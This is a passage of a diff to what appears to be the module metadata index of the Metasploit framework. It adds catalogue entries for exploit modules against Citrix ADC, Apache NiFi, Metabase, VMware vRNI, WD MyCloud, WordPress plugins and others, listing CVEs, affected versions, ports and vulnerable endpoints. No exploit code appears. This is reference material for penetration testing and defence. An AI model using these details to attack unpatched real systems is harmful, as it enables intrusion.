+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "AKA": [
+        "QueueJumper"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/mssql/mssql_hashdump": {
    "name": "MSSQL Password Hashdump",
    "fullname": "auxiliary/scanner/mssql/mssql_hashdump",
@@ -42036,7 +42220,7 @@
      "theLightCosine <theLightCosine@metasploit.com>",
      "jcran <jcran@metasploit.com>"
    ],
-    "description": "This module exploits a password bypass vulnerability in MySQL in order\n        to extract the usernames and encrypted password hashes from a MySQL server.\n        These hashes are stored as loot for later cracking.",
+    "description": "This module exploits a password bypass vulnerability in MySQL in order\n        to extract the usernames and encrypted password hashes from a MySQL server.\n        These hashes are stored as loot for later cracking.\n\n        Impacts MySQL versions:\n        - 5.1.x before 5.1.63\n        - 5.5.x before 5.5.24\n        - 5.6.x before 5.6.6\n\n        And MariaDB versions:\n        - 5.1.x before 5.1.62\n        - 5.2.x before 5.2.12\n        - 5.3.x before 5.3.6\n        - 5.5.x before 5.5.23",
    "references": [
      "CVE-2012-2122",
      "OSVDB-82804",
@@ -42052,7 +42236,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-08-17 23:15:38 +0000",
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -48205,7 +48389,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-01-24 14:30:39 +0000",
+    "mod_time": "2023-06-14 00:40:33 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_login",
@@ -49555,7 +49739,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-04-14 17:27:19 +0000",
+    "mod_time": "2023-07-25 13:44:47 +0000",
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -51774,7 +51958,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2023-01-24 14:30:39 +0000",
+    "mod_time": "2023-06-14 00:40:33 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
@@ -51825,7 +52009,7 @@
      "winrm"
    ],
    "targets": null,
-    "mod_time": "2023-01-24 14:30:39 +0000",
+    "mod_time": "2023-06-14 00:40:33 +0000",
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
@@ -58845,6 +59029,74 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_freebsd/http/citrix_formssso_target_rce": {
+    "name": "Citrix ADC (NetScaler) Forms SSO Target RCE",
+    "fullname": "exploit/freebsd/http/citrix_formssso_target_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-07-18",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes",
+      "Douglass McKee",
+      "Spencer McIntyre",
+      "rwincey"
+    ],
+    "description": "A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer\n          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in\n          remote code execution as root.",
+    "references": [
+      "CVE-2023-3519",
+      "URL-https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519",
+      "URL-https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Targeting",
+      "Citrix ADC 13.1-48.47",
+      "Citrix ADC 13.1-37.38",
+      "Citrix ADC 13.0-91.12",
+      "Citrix ADC 12.1-65.25",
+      "Citrix ADC 12.1-64.17"
+    ],
+    "mod_time": "2023-08-07 12:50:23 +0000",
+    "path": "/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb",
+    "is_install_path": true,
+    "ref_name": "freebsd/http/citrix_formssso_target_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_freebsd/http/watchguard_cmd_exec": {
    "name": "Watchguard XCS Remote Command Execution",
    "fullname": "exploit/freebsd/http/watchguard_cmd_exec",
@@ -60271,6 +60523,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/apache_nifi_h2_rce": {
+    "name": "Apache NiFi H2 Connection String Remote Code Execution",
+    "fullname": "exploit/linux/http/apache_nifi_h2_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-12",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Matei \"Mal\" Badanoiu"
+    ],
+    "description": "The DBCPConnectionPool and HikariCPConnectionPool Controller Services in\n          Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user\n          to configure a Database URL with the H2 driver that enables custom code execution.\n\n          This exploit will result in several shells (5-7).\n          Successfully tested against Apache nifi 1.17.0 through 1.21.0.",
+    "references": [
+      "CVE-2023-34468",
+      "URL-https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8",
+      "URL-https://issues.apache.org/jira/browse/NIFI-11653",
+      "URL-https://nifi.apache.org/security.html#1.22.0"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)"
+    ],
+    "mod_time": "2023-08-28 17:39:02 +0000",
+    "path": "/modules/exploits/linux/http/apache_nifi_h2_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/apache_nifi_h2_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/apache_ofbiz_deserialization": {
    "name": "Apache OFBiz XML-RPC Java Deserialization",
    "fullname": "exploit/linux/http/apache_ofbiz_deserialization",
@@ -61330,6 +61646,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/chamilo_unauth_rce_cve_2023_34960": {
+    "name": "Chamilo unauthenticated command injection in PowerPoint upload",
+    "fullname": "exploit/linux/http/chamilo_unauth_rce_cve_2023_34960",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-01",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Randorisec"
+    ],
+    "description": "Chamilo is an e-learning platform, also called Learning Management Systems (LMS).\n          This module exploits an unauthenticated remote command execution vulnerability\n          that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).\n          Due to a functionality called Chamilo Rapid to easily convert PowerPoint\n          slides to courses on Chamilo, it is possible for an unauthenticated remote\n          attacker to execute arbitrary commands at OS level using a malicious SOAP\n          request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.",
+    "references": [
+      "CVE-2023-34960",
+      "URL-https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities",
+      "URL-https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, x64, x86, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-08-23 11:38:07 +0000",
+    "path": "/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/chamilo_unauth_rce_cve_2023_34960",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cisco_asax_sfr_rce": {
    "name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
    "fullname": "exploit/linux/http/cisco_asax_sfr_rce",
@@ -65348,6 +65728,74 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/h2_webinterface_rce": {
+    "name": "H2 Web Interface Create Alias RCE",
+    "fullname": "exploit/linux/http/h2_webinterface_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-04-09",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "gambler",
+      "h4ckNinja",
+      "Nairuz Abulhul"
+    ],
+    "description": "The H2 database contains an alias function which allows for arbitrary Java code to be used.\n          This functionality can be abused to create an exec functionality to pull our payload down\n          and execute it. H2's web interface contains restricts MANY characters, so injecting a payload\n          directly is not favorable. A valid database connection is required. If the database engine\n          was configured to allow creation of databases, the module default can be used which\n          utilizes an in memory database. Some Docker instances of H2 don't allow writing to\n          folders such as /tmp, so we default to writing to the working directory of the software.\n\n          This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)",
+    "references": [
+      "EDB-44422",
+      "EDB-45506",
+      "URL-https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2",
+      "URL-https://www.h2database.com/html/commands.html#create_alias"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8082,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-08-08 15:28:34 +0000",
+    "path": "/modules/exploits/linux/http/h2_webinterface_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/h2_webinterface_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "NOCVE": [
+        "abusing a feature"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/hadoop_unauth_exec": {
    "name": "Hadoop YARN ResourceManager Unauthenticated Command Execution",
    "fullname": "exploit/linux/http/hadoop_unauth_exec",
@@ -67196,6 +67644,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/metabase_setup_token_rce": {
+    "name": "Metabase Setup Token RCE",
+    "fullname": "exploit/linux/http/metabase_setup_token_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-22",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Maxwell Garrett",
+      "Shubham Shah"
+    ],
+    "description": "Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token\n          is accessible even after the setup process has been completed. With this token\n          a user is able to submit the setup functionality to create a new database.\n          When creating a new database, an H2 database string is created with a TRIGGER\n          that allows for code execution. We use a sample database for our connection\n          string to prevent corrupting real databases.\n\n          Successfully tested against Metabase 0.46.6.",
+    "references": [
+      "URL-https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/",
+      "URL-https://www.metabase.com/blog/security-advisory",
+      "CVE-2023-38646"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2023-08-08 15:35:50 +0000",
+    "path": "/modules/exploits/linux/http/metabase_setup_token_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/metabase_setup_token_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/microfocus_obr_cmd_injection": {
    "name": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection",
    "fullname": "exploit/linux/http/microfocus_obr_cmd_injection",
@@ -70928,6 +71438,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/solarview_unauth_rce_cve_2023_23333": {
+    "name": "SolarView Compact unauthenticated remote command execution vulnerability.",
+    "fullname": "exploit/linux/http/solarview_unauth_rce_cve_2023_23333",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-15",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "CONTEC's SolarView™ Series enables you to monitor and visualize solar power and is only available in Japan.\n          This module exploits a command injection vulnerability on the SolarView Compact `v6.00` web application\n          via vulnerable endpoint `downloader.php`.\n          After exploitation, an attacker will have full access with the same user privileges under\n          which the webserver is running (typically as user `contec`).",
+    "references": [
+      "CVE-2023-23333",
+      "URL-https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, armle, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-09-05 17:06:01 +0000",
+    "path": "/modules/exploits/linux/http/solarview_unauth_rce_cve_2023_23333.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/solarview_unauth_rce_cve_2023_23333",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/sonicwall_cve_2021_20039": {
    "name": "SonicWall SMA 100 Series Authenticated Command Injection",
    "fullname": "exploit/linux/http/sonicwall_cve_2021_20039",
@@ -73343,6 +73915,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/vmware_vrni_rce_cve_2023_20887": {
+    "name": "VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE",
+    "fullname": "exploit/linux/http/vmware_vrni_rce_cve_2023_20887",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-07",
+    "type": "exploit",
+    "author": [
+      "Sina Kheirkhah",
+      "Anonymous with Trend Micro Zero Day Initiative",
+      "h00die"
+    ],
+    "description": "VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection\n          when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a\n          remote unauthenticated attacker to execute arbitrary commands on the underlying operating system\n          as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.\n          VMware has evaluated the severity of this issue to be in the Critical severity range with a\n          maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the\n          context of 'root' on the appliance.\n          VMWare 6.x version are vulnerable.\n\n          This module exploits the vulnerability to upload and execute payloads gaining root privileges.\n          Successfully tested against version 6.8.0.",
+    "references": [
+      "CVE-2023-20887",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2023-0012.html",
+      "URL-https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/",
+      "URL-https://github.com/sinsinology/CVE-2023-20887"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-07-20 16:40:28 +0000",
+    "path": "/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_vrni_rce_cve_2023_20887",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/vmware_vrops_mgr_ssrf_rce": {
    "name": "VMware vRealize Operations (vROps) Manager SSRF RCE",
    "fullname": "exploit/linux/http/vmware_vrops_mgr_ssrf_rce",
@@ -73640,6 +74277,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/wd_mycloud_unauthenticated_cmd_injection": {
+    "name": "Western Digital MyCloud unauthenticated command injection",
+    "fullname": "exploit/linux/http/wd_mycloud_unauthenticated_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2016-12-14",
+    "type": "exploit",
+    "author": [
+      "Erik Wynter",
+      "Steven Campbell",
+      "Remco Vermeulen"
+    ],
+    "description": "This module exploits authentication bypass (CVE-2018-17153) and\n          command injection (CVE-2016-10108) vulnerabilities in Western\n          Digital MyCloud before 2.30.196 in order to achieve\n          unauthenticated remote code execution as the root user.\n\n          The module first performs a check to see if the target is\n          WD MyCloud. If so, it attempts to trigger an authentication\n          bypass (CVE-2018-17153) via a crafted GET request to\n          /cgi-bin/network_mgr.cgi. If the server responds as expected,\n          the module assesses the vulnerability status by attempting to\n          exploit a commend injection vulnerability (CVE-2016-10108) in\n          order to print a random string via the echo command. This is\n          done via a crafted POST request to /web/google_analytics.php.\n\n          If the server is vulnerable, the same command injection vector\n          is leveraged to execute the payload.\n\n          This module has been successfully tested against Western Digital\n          MyCloud version 2.30.183.\n\n          Note: based on the available disclosures, it seems that the\n          command injection vector (CVE-2016-10108) might be exploitable\n          without the authentication bypass (CVE-2018-17153) on versions\n          before 2.21.126. The obtained results on 2.30.183 imply that\n          the patch for CVE-2016-10108 did not actually remove the command\n          injection vector, but only prevented unauthenticated access to it.",
+    "references": [
+      "CVE-2016-10108",
+      "CVE-2018-17153",
+      "URL-https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/",
+      "URL-https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "armle, cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-07-27 23:09:50 +0000",
+    "path": "/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wd_mycloud_unauthenticated_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webcalendar_settings_exec": {
    "name": "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
    "fullname": "exploit/linux/http/webcalendar_settings_exec",
@@ -86607,7 +87309,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2023-04-17 13:01:30 +0000",
+    "mod_time": "2023-08-08 14:47:14 +0000",
    "path": "/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb",
    "is_install_path": true,
    "ref_name": "multi/http/adobe_coldfusion_rce_cve_2023_26360",
@@ -87191,7 +87893,7 @@
    "author": [
      "Graeme Robinson"
    ],
-    "description": "This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must\n          be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor\n          processor is created then is configured with the payload and started. The processor is then stopped and\n          deleted.",
+    "description": "This module uses the NiFi API to create an ExecuteProcess processor that will execute OS commands. The API must\n          be unsecured (or credentials provided) and the ExecuteProcess processor must be available. An ExecuteProcessor\n          processor is created then is configured with the payload and started. The processor is then stopped and\n          deleted.\n\n          Verified against 1.12.1, 1.12.1-RC2, and 1.20.0",
    "references": [
      "URL-https://nifi.apache.org/",
      "URL-https://github.com/apache/nifi",
@@ -87219,7 +87921,7 @@
      "Unix (In-Memory)",
      "Windows (In-Memory)"
    ],
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-08-28 17:39:02 +0000",
    "path": "/modules/exploits/multi/http/apache_nifi_processor_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_nifi_processor_rce",
@@ -87236,6 +87938,9 @@
      "SideEffects": [
        "ioc-in-logs",
        "config-changes"
+      ],
+      "NOCVE": [
+        "abusing a feature"
      ]
    },
    "session_types": false,
@@ -97120,6 +97825,67 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/rudder_server_sqli_rce": {
+    "name": "Rudder Server SQLI Remote Code Execution",
+    "fullname": "exploit/multi/http/rudder_server_sqli_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-06-16",
+    "type": "exploit",
+    "author": [
+      "Ege Balcı <egebalci@pm.me>"
+    ],
+    "description": "This Metasploit module exploits a SQL injection vulnerability in\n          RudderStack's rudder-server, an open source Customer Data Platform (CDP).\n          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.\n          By exploiting this flaw, an attacker can execute arbitrary SQL commands,\n          which may lead to Remote Code Execution (RCE) due to the `rudder` role\n          in PostgreSQL having superuser permissions by default.",
+    "references": [
+      "CVE-2023-30625",
+      "URL-https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-30625"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2023-07-31 15:13:35 +0000",
+    "path": "/modules/exploits/multi/http/rudder_server_sqli_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/rudder_server_sqli_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/sflog_upload_exec": {
    "name": "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
    "fullname": "exploit/multi/http/sflog_upload_exec",
@@ -98909,6 +99675,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/subrion_cms_file_upload_rce": {
+    "name": "Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE",
+    "fullname": "exploit/multi/http/subrion_cms_file_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-11-04",
+    "type": "exploit",
+    "author": [
+      "Hexife",
+      "Fellipe Oliveira",
+      "Ismail E. Dawoodjee"
+    ],
+    "description": "This module exploits an authenticated file upload vulnerability in\n          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by\n          the .htaccess file not preventing the execution of .pht, .phar, and\n          .xhtml files. Files with these extensions are not included in the\n          .htaccess blacklist, hence these files can be uploaded and executed\n          to achieve remote code execution. In this module, a .phar file with\n          a randomized name is uploaded and executed to receive a Meterpreter\n          session on the target, then deletes itself afterwards.",
+    "references": [
+      "EDB-49876",
+      "CVE-2018-19422",
+      "URL-https://github.com/intelliants/subrion/issues/801",
+      "URL-https://github.com/intelliants/subrion/issues/840",
+      "URL-https://github.com/advisories/GHSA-73xj-v6gc-g5p5"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP"
+    ],
+    "mod_time": "2023-08-02 10:10:27 +0000",
+    "path": "/modules/exploits/multi/http/subrion_cms_file_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/subrion_cms_file_upload_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/sugarcrm_webshell_cve_2023_22952": {
    "name": "SugarCRM unauthenticated Remote Code Execution (RCE)",
    "fullname": "exploit/multi/http/sugarcrm_webshell_cve_2023_22952",
@@ -101252,6 +102083,73 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_plugin_fma_shortcode_unauth_rce": {
+    "name": "Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode",
+    "fullname": "exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-05-31",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Mateus Machado Tesser"
+    ],
+    "description": "The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.\n          This leads to RCE in cases where the allowed MIME type list does not include PHP files.\n          In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.\n          File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.\n          To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration\n          vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system\n          with the same privileges under which the Wordpress web services run. ",
+    "references": [
+      "CVE-2023-2068",
+      "URL-https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068",
+      "PACKETSTORM-172707",
+      "WPVDB-58f72953-56d2-4d86-a49b-311b5fc58056"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "cmd, php, x64, x86, aarch64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP",
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2023-07-06 10:09:51 +0000",
+    "path": "/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_plugin_fma_shortcode_unauth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/wp_plugin_modern_events_calendar_rce": {
    "name": "Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution",
    "fullname": "exploit/multi/http/wp_plugin_modern_events_calendar_rce",
@@ -104818,6 +105716,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/php/jorani_path_trav": {
+    "name": "Jorani unauthenticated Remote Code Execution",
+    "fullname": "exploit/multi/php/jorani_path_trav",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-06",
+    "type": "exploit",
+    "author": [
+      "RIOUX Guilhem (jrjgjk)"
+    ],
